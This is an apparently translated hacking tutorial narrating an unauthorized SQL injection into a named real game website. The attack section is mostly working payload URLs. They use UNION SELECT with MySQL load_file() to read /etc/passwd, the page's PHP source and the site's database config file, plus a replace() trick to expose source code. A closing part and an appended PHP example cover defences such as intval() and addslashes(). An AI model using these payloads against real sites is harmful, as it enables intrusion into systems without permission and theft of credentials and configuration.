I heard from Promise that Casi 2.0 was out, and Promise also gave me the address of a vulnerable site. I had nothing to do, had been feeling rather down lately and could not keep studying, and today Promise reminded me that it was a good time to learn PHP, so let me see whether I can take a site like this.
Process:
The address Promise gave was http://www.gametea.com//showboard.php?id=282.
A very standard PHP injection point, so we inject in the standard PHP way: first append a single quote ':
http://www.gametea.com/showboard.php?id=282'
(Figure 1)
The error output told us two things. The first is MAGIC_QUOTES_GPC = Off.
The second is the web path: /home/newgt/showboard.php.
Before submitting the statement, let's explain the principle of PHP injection with a small example. PHP injection is caused by insufficient filtering of variables.
Look at the following two SQL statements:
① select * from article WHERE articleid='$id'
② select * from article WHERE articleid=$id
Both forms are common in all kinds of programs, but their security differs. The first puts the variable $id inside a pair of single quotes, so whatever we submit becomes a string; even if it contains a valid SQL statement, it will not be executed as SQL. The second is different: because the variable is not enclosed in single quotes, whatever we submit after the value (everything following the first space) is executed as part of the SQL statement. We submit one successful malformed injection statement for each of the two forms to see the difference.
① set the variable $id to:
1' and 1=2 union select * from user where userid=1/*
The entire SQL statement then becomes:
select * from article where articleid='1' and 1=2 union select * from user where userid=1/*'
② set the variable $id to:
1 and 1=2 union select * from user where userid=1
The entire SQL statement then becomes:
select * from article where articleid=1 and 1=2 union select * from user where userid=1
Do you see it? Because the first statement has single quotes, we must first close the preceding quote so that what follows is executed as SQL, and comment out the trailing single quote left over from the original statement; only then does the injection succeed. If MAGIC_QUOTES_GPC in php.ini is set to On, or the addslashes() function is applied to the variable before use, our attack comes to nothing. The second statement does not enclose the variable in quotes, so we need not think about closing or commenting; a direct submission is enough.
Okay, now we submit the statement following Angel's method:
http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,7,6,5,4,3,2,1
From this we learn that positions 7 and 9 are displayed as text, i.e. those two columns can show the contents of the file we want. Next is reading a file on the server: from the web path, this machine appears to be UNIX, so our goal is the file /etc/passwd.
We know that in SQL statements we can use a variety of MySQL built-in functions. Commonly used ones are database(), user(), system_user(), session_user() and current_user(), which return information about the system. A more useful one is load_file(), which reads a file and returns its contents as a string.
Seeing this, you should be able to think of what we can do: read some confidential files. But there are conditions:
The file to be read must be on the server
The full path of the file must be specified
We must have permission to read it, and the file must be fully readable
The file to be read must be smaller than max_allowed_packet
If the file does not exist or cannot be read for any of the above reasons, the function returns NULL. The hardest condition to meet is permissions: under Windows, if NTFS permissions are set properly, the relevant files cannot be read; when we meet a file that only administrators can access, there is no way to load_file() it.
In actual injection we have two difficult points to solve:
The absolute physical path
Constructing an effective malformed statement
In many PHP programs, when a wrong query is submitted and display_errors = On, the program exposes the absolute path of the web directory. Once the path is known, for an injectable PHP program the security of the entire server is severely compromised, and constructing the statement is a trifle.
We use load_file(char()) here, so we need to convert /etc/passwd into its character codes (the author calls this hexadecimal, but the CHAR() arguments used below are decimal ASCII values); we use the ASC2CHR tool to do the conversion for us.
(Figure 3)
We easily got the encoded form of /etc/passwd.
The constructed statement is:
http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1
We got the /etc/passwd file very easily; here is a fragment of it.
Now we have to find a way to read the config file; since we already have the web path, that should be easy.
The constructed statement:
http://www.gametea.com//showboard.php?id=282 and 1=2 union select 50,9,8,load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),6,5,4,3,2,1
But, contrary to what we expected, we did not get the PHP source code: the PHP code that was read was executed again on the server side. At this point we could use Angel's method, INTO OUTFILE, to write the file back to the server and then read it, but I did not do that, because I don't want to be confined to someone else's way of thinking. I thought MySQL must have powerful functions that could help. I remembered that when learning PHP's string functions there was a replace() function whose role is to replace a specified string with the string we want, and I thought it could be used here.
Appendix: replace() function prototype
REPLACE(str, from_str, to_str) returns the string str with all occurrences of the string from_str replaced by the string to_str.
mysql> SELECT REPLACE('www.mysql.com', 'w', 'Ww');
'WwWwWw.mysql.com'
Here I thought about the fixed form of PHP source code, which is this:
So, breaking with convention, we replace the < character with a space. The statement:
http://www.gametea.com//showboard.php?id=282 and 1=2 union select 50,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1
CHAR(60) is <, and CHAR(32) is a space. We've succeeded; everybody look at the picture.
Okay, now our goal is to read the config file. His config file is /home/newgt/localdata.php,
so we build the statement as follows:
http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1
(Figure 7) We've got the config file.
By now our approach should be clear, and I won't go further; if you are interested you can refer to my earlier articles to continue the penetration. Here we have clearly seen how a small injection vulnerability can lead to such a large hole, and I hope people at home pay attention. Prevention can be approached from two sides: the server and the code itself. There are many articles on server configuration; essentially, set MAGIC_QUOTES_GPC to On and display_errors to Off, and I won't say more here. Since this article concerns a problem in the program, we look for the cause in the program itself.
PHP is not only easier to use than ASP; its security also shows in its built-in functions. If the variable is an integer, a single intval() call solves the problem: process the variable before executing the query, as in the following very safe example:
$id = intval($id);
mysql_query("SELECT * FROM article WHERE articleid='$id'");
or write this:
mysql_query("SELECT * FROM article WHERE articleid=" . intval($id));
Whichever way it is written, the value is converted to an integer before it reaches the database. Many large programs are written this way, and it is very concise.
String variables can use the built-in addslashes() function, which does the same job as MAGIC_QUOTES_GPC: after it is applied, every ' (single quote), " (double quote), \ (backslash) and NUL character is automatically turned into an escape sequence with a leading backslash. In newer PHP versions, using addslashes() even with MAGIC_QUOTES_GPC on causes no conflict, so you can use it with confidence. Examples are as follows:
$username = addslashes($username);
mysql_query("SELECT * FROM members WHERE userid='$username'");
or write this:
mysql_query("SELECT * FROM members WHERE userid='" . addslashes($username) . "'");  // the escaped value still needs its surrounding quotes
You can also use the addslashes() function to avoid quote-pairing errors. The earlier fix for the search engine is simply to turn "_" and "%" into "\_" and "\%" (backslash-escaping the LIKE wildcards), and of course do not forget addslashes() as well. The specific code is as follows:
$keywords = addslashes($keywords);
$keywords = str_replace("_", "\_", $keywords);
$keywords = str_replace("%", "\%", $keywords);
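As an added example (not code from the original article), the two query shapes the article contrasts and the search-keyword case, hardened with the functions it recommends; the functions only build SQL strings so the file runs without a database, and the inputs are constructed. The hypothetical table and column names follow the article's examples.

```php
<?php
// Added example, not code from the original article. The article's
// mysql_query() calls are replaced by returned SQL strings so this file
// runs without a database. All inputs below are constructed.

// Integer parameter: intval() keeps only the leading integer, so anything
// appended after it ("and 1=2 union select ...") never reaches the query,
// whether or not the value is quoted.
function article_query($id)
{
    return "SELECT * FROM article WHERE articleid=" . intval($id);
}

// String parameter: the escaped value must ALSO be enclosed in quotes.
// An unquoted addslashes() value is still injectable, because there is no
// quote character for the added backslash to neutralise.
function member_query($username)
{
    return "SELECT * FROM members WHERE userid='" . addslashes($username) . "'";
}

// Search keyword used in LIKE: escape quotes first, then backslash the
// wildcards "_" and "%" so the user's text is matched literally.
function keyword_query($keywords)
{
    $k = addslashes($keywords);
    $k = str_replace('_', '\_', $k);   // '\_' is backslash + underscore
    $k = str_replace('%', '\%', $k);
    return "SELECT * FROM article WHERE title LIKE '%" . $k . "%'";
}

// Constructed inputs shaped like the payloads discussed in the article.
$cases = [
    ['article_query', "282 and 1=2 union select 50,9,8,7,6,5,4,3,2,1"],
    ['member_query',  "1' and 1=2/*"],
    ['keyword_query', "100%_sure"],
];
foreach ($cases as [$fn, $input]) {
    echo $fn, "(", $input, ")\n    ", $fn($input), "\n";
}
```

Two caveats: on PHP builds where magic_quotes_gpc is On, addslashes() escapes the input a second time, so check get_magic_quotes_gpc() before calling it, and addslashes() is not charset-aware, so mysql_real_escape_string() (or, in current PHP, mysqli/PDO prepared statements, which need no escaping at all) is the better choice for a live connection.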